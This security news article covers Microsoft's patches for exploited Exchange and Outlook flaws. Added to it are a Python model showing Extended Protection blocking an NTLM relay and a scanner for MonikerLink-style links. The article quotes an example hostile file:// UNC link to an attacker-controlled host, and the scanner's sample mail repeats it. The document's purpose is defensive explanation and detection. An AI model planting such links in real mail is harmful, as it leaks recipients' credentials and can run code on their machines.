Microsoft on Wednesday acknowledged that a newly disclosed critical security flaw in Exchange Server has been actively exploited in the wild, a day after it released fixes for the vulnerability as part of its Patch Tuesday updates.
Tracked as CVE-2024-21410 (CVSS score: 9.8), the issue has been described as a case of privilege escalation impacting Exchange Server.
"An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability," the company said in an advisory published this week.
"The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim's behalf."
Successful exploitation of the flaw could permit an attacker to relay a user's leaked Net-NTLMv2 hash against a susceptible Exchange Server and authenticate as the user, Redmond added.
The tech giant, in an update to its bulletin, revised its Exploitability Assessment to "Exploitation Detected," noting that it has now enabled Extended Protection for Authentication (EPA) by default with the Exchange Server 2019 Cumulative Update 14 (CU14) update. Servers that have not installed CU14 therefore remain exposed to the relay.
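To show concretely why turning on EPA is the fix for the relay Microsoft describes, here is an added example (not Microsoft's or Exchange's code) that models the NTLMv2 exchange in pure Python: the victim's response is bound to the TLS certificate it actually sees, Exchange checks that binding against its own certificate, and a relayed response fails. The NT hash, the two "certificates", the server name EXCH01, the user alice in domain CORP, and the three tokenChecking modes (modelled on the IIS extendedProtection setting) are all assumptions of the example.

```python
"""Models why Extended Protection for Authentication (EPA) defeats an NTLM
relay against Exchange. Added example, not Microsoft's or Exchange's code;
every value below (NT hash, "certificates", host names, user) is constructed.
NTLMv2 follows MS-NLMP 3.3.2; the binding is the RFC 5929 tls-server-end-point
binding, carried in NTLM as the MsvAvChannelBindings AV pair."""
import hashlib
import hmac
import struct

MSV_AV_EOL = 0x0000
MSV_AV_NB_COMPUTER_NAME = 0x0001
MSV_AV_CHANNEL_BINDINGS = 0x000A

NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # constructed stand-in for the user's NT hash
ATTACKER_CERT = b"constructed DER of the attacker's TLS listener certificate"
EXCHANGE_CERT = b"constructed DER of the real Exchange server certificate"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")  # constructed
CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")  # constructed
TIMESTAMP = 133523712000000000  # constructed FILETIME


def channel_binding_token(cert_der: bytes) -> bytes:
    """MD5 over a gss_channel_bindings_struct whose only non-empty field is the
    application data 'tls-server-end-point:' + SHA-256(certificate)."""
    app_data = b"tls-server-end-point:" + hashlib.sha256(cert_der).digest()
    gss_struct = (struct.pack("<II", 0, 0)   # initiator addrtype, address length
                  + struct.pack("<II", 0, 0)  # acceptor addrtype, address length
                  + struct.pack("<I", len(app_data)) + app_data)
    return hashlib.md5(gss_struct).digest()


def encode_av_pairs(pairs: dict[int, bytes]) -> bytes:
    body = b"".join(struct.pack("<HH", av_id, len(v)) + v for av_id, v in pairs.items())
    return body + struct.pack("<HH", MSV_AV_EOL, 0)


def decode_av_pairs(buf: bytes) -> dict[int, bytes]:
    pairs, pos = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", buf, pos)
        pos += 4
        if av_id == MSV_AV_EOL:
            return pairs
        pairs[av_id] = buf[pos:pos + av_len]
        pos += av_len


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, av_pairs, client_challenge, timestamp):
    """NtChallengeResponse = NTProofStr || temp. The AV pairs sit inside temp,
    so the HMAC covers them and a relay cannot edit them."""
    temp = (b"\x01\x01" + bytes(6) + struct.pack("<Q", timestamp)
            + client_challenge + bytes(4) + av_pairs + bytes(4))
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def verify_ntlmv2(nt_hash, user, domain, server_challenge, response, own_cbt, token_checking):
    """Server side. token_checking mirrors IIS extendedProtection tokenChecking:
    'None' ignores bindings, 'Allow' checks one if present, 'Require' demands it."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    if not hmac.compare_digest(proof, expected):
        return "rejected: NTProofStr mismatch"
    if token_checking == "None":
        return "accepted"
    cbt = decode_av_pairs(temp[28:]).get(MSV_AV_CHANNEL_BINDINGS)  # 28 = 2+6+8+8+4 header bytes
    if cbt is None:
        return "accepted" if token_checking == "Allow" else "rejected: no channel binding"
    if not hmac.compare_digest(cbt, own_cbt):
        return "rejected: channel binding mismatch"
    return "accepted"


def handshake(cert_seen_by_client: bytes, token_checking: str, strip_cbt: bool = False) -> str:
    """One NTLM logon to Exchange. If the TLS session the client sees terminates
    at an attacker, the client binds its response to the attacker's certificate."""
    # The client copies Exchange's TargetInfo from the CHALLENGE and adds the binding.
    av = {MSV_AV_NB_COMPUTER_NAME: "EXCH01".encode("utf-16-le")}
    av[MSV_AV_CHANNEL_BINDINGS] = channel_binding_token(cert_seen_by_client)
    response = ntlmv2_response(NT_HASH, "alice", "CORP", SERVER_CHALLENGE,
                               encode_av_pairs(av), CLIENT_CHALLENGE, TIMESTAMP)
    if strip_cbt:  # a relay trying to remove the binding before forwarding
        temp = response[16:]
        av = {k: v for k, v in decode_av_pairs(temp[28:]).items() if k != MSV_AV_CHANNEL_BINDINGS}
        response = response[:16] + temp[:28] + encode_av_pairs(av) + bytes(4)
    return verify_ntlmv2(NT_HASH, "alice", "CORP", SERVER_CHALLENGE, response,
                         channel_binding_token(EXCHANGE_CERT), token_checking)


def direct_logon(token_checking: str) -> str:
    return handshake(EXCHANGE_CERT, token_checking)


def relay_attempt(token_checking: str, strip_cbt: bool = False) -> str:
    return handshake(ATTACKER_CERT, token_checking, strip_cbt)


if __name__ == "__main__":
    for mode in ("None", "Allow", "Require"):
        print(f"tokenChecking={mode:8} direct: {direct_logon(mode):9} relayed: {relay_attempt(mode)}")
    print("relay with binding stripped:", relay_attempt("Require", strip_cbt=True))
```

The point to take from the run is that the relay succeeds only when the server ignores channel bindings: with EPA on, the forwarded response carries a binding to the attacker's certificate, and stripping that AV pair breaks the NTProofStr, which is why the attacker cannot simply remove it.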
Details about the nature of the exploitation and the identity of the threat actors that may be abusing the flaw are currently unknown. However, Russian state-affiliated hacking crews such as APT28 (aka Forest Blizzard) have a history of exploiting flaws in Microsoft Outlook to stage NTLM relay attacks.
Earlier this month, Trend Micro implicated the adversary in NTLM relay attacks targeting high-value entities since at least April 2022. The intrusions targeted organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with labor, social welfare, finance, parenthood, and local city councils.
CVE-2024-21410 adds to two other Windows flaws – CVE-2024-21351 (CVSS score: 7.6) and CVE-2024-21412 (CVSS score: 8.1) – that were patched by Microsoft this week and have been actively weaponized in real-world attacks.
The exploitation of CVE-2024-21412, a bug that allows a bypass of Windows SmartScreen protections, has been attributed to an advanced persistent threat dubbed Water Hydra (aka DarkCasino), which has previously leveraged zero-days in WinRAR to deploy the DarkMe trojan.
"The group used internet shortcuts disguised as a JPEG image that, when selected by the user, allows the threat actor to exploit CVE-2024-21412," Trend Micro said. "The group can then bypass Microsoft Defender SmartScreen and fully compromise the Windows host as part of its attack chain."
Microsoft's Patch Tuesday update also addresses CVE-2024-21413, another critical shortcoming affecting the Outlook email software that could result in remote code execution by trivially circumventing security measures such as Protected View.
Codenamed MonikerLink by Check Point, the issue "allows for a wide and serious impact, varying from leaking of local NTLM credential information to arbitrary code execution."
The vulnerability stems from the incorrect parsing of "file://" hyperlinks, which makes it possible to achieve code execution by adding an exclamation mark to URLs pointing to arbitrary payloads hosted on attacker-controlled servers (e.g., "file:///\\10.10.111.111\test\test.rtf!something").
"The bug not only allows the leaking of the local NTLM information, but it may also allow remote code execution and more as an attack vector," the cybersecurity firm said. "It could also bypass the Office Protected View when it's used as an attack vector to target other Office applications."
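As an added example (not Check Point's or Microsoft's code), the following Python scanner pulls the hyperlinks out of an HTML mail body and flags the shape described above: a file:// link whose target is a remote UNC host, and a "!" following the file name. A remote file link already causes an NTLM credential leak when the client resolves it; the "!" form is the one Check Point ties to code execution. The sample mail body and its host names are constructed, and the decision to percent-decode the href before inspection is the scanner's own conservative assumption, not behaviour the page attributes to Outlook.

```python
"""Flags hyperlinks of the MonikerLink shape (CVE-2024-21413) in an HTML mail
body: a file:// link aimed at a remote (UNC) host, and the '!' after the file
name seen in Check Point's example. Added example, not Check Point's or
Microsoft's code; SAMPLE_MAIL is constructed. Percent-decoding the href first
is this scanner's assumption, so that a %21 cannot hide the '!'."""
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import unquote


class _HrefCollector(HTMLParser):
    """Collects every href attribute from <a> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value)


_DRIVE = re.compile(r"[A-Za-z]:")


def classify_file_link(href: str) -> Optional[dict]:
    """None for non-file: links. Otherwise a dict with host, path and two flags:
    remote  - the target is a UNC host, so resolving it leaks the user's NTLM hash
    moniker - a '!' follows the file name, the composite-moniker form from the text."""
    s = unquote(href.strip())
    if not s.lower().startswith("file:"):
        return None
    # Normalise both slash styles, then drop the leading slashes so the first
    # component is either a drive letter, 'localhost', or a remote host name.
    body = s[5:].replace("\\", "/").lstrip("/")
    head, _, rest = body.partition("/")
    if head == "" or head.lower() == "localhost" or _DRIVE.fullmatch(head):
        host = None
        path = rest if (head == "" or head.lower() == "localhost") else head + "/" + rest
    else:
        host, path = head, rest
    return {"href": href, "host": host, "path": path,
            "remote": host is not None, "moniker": "!" in path}


def scan_mail_body(html: str) -> list[dict]:
    """All file: links in the body, classified, in document order."""
    parser = _HrefCollector()
    parser.feed(html)
    return [f for f in (classify_file_link(h) for h in parser.hrefs) if f]


def verdict(finding: dict) -> str:
    if finding["remote"] and finding["moniker"]:
        return "block: remote file link with '!' item moniker (MonikerLink pattern)"
    if finding["remote"]:
        return "warn: remote file link (NTLM hash leak on click)"
    return "info: local file link"


# Constructed mail body: one ordinary https link, one local file link, one UNC
# link without '!', and the Check Point-shaped link in plain and %21-encoded form.
SAMPLE_MAIL = r"""<html><body>
<p>Quarterly figures: <a href="https://intranet.example.test/q1.pdf">Q1 report</a></p>
<p>Local copy: <a href="file:///C:/Users/Public/q1.pdf">open</a></p>
<p>Archive: <a href="file://fileserver.example.test/finance/q1.pdf">UNC copy</a></p>
<p>Read me: <a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a></p>
<p>Encoded: <a href="file:///\\10.10.111.111\test\test.rtf%21something">CLICK ME</a></p>
</body></html>"""


if __name__ == "__main__":
    for finding in scan_mail_body(SAMPLE_MAIL):
        print(f"{verdict(finding):70} {finding['href']}")
```

Run against SAMPLE_MAIL the scanner reports the local link as informational, the plain UNC link as a credential-leak warning, and both spellings of the "!" link as blocks; feeding it a real mail store is a matter of replacing SAMPLE_MAIL with each message's HTML body.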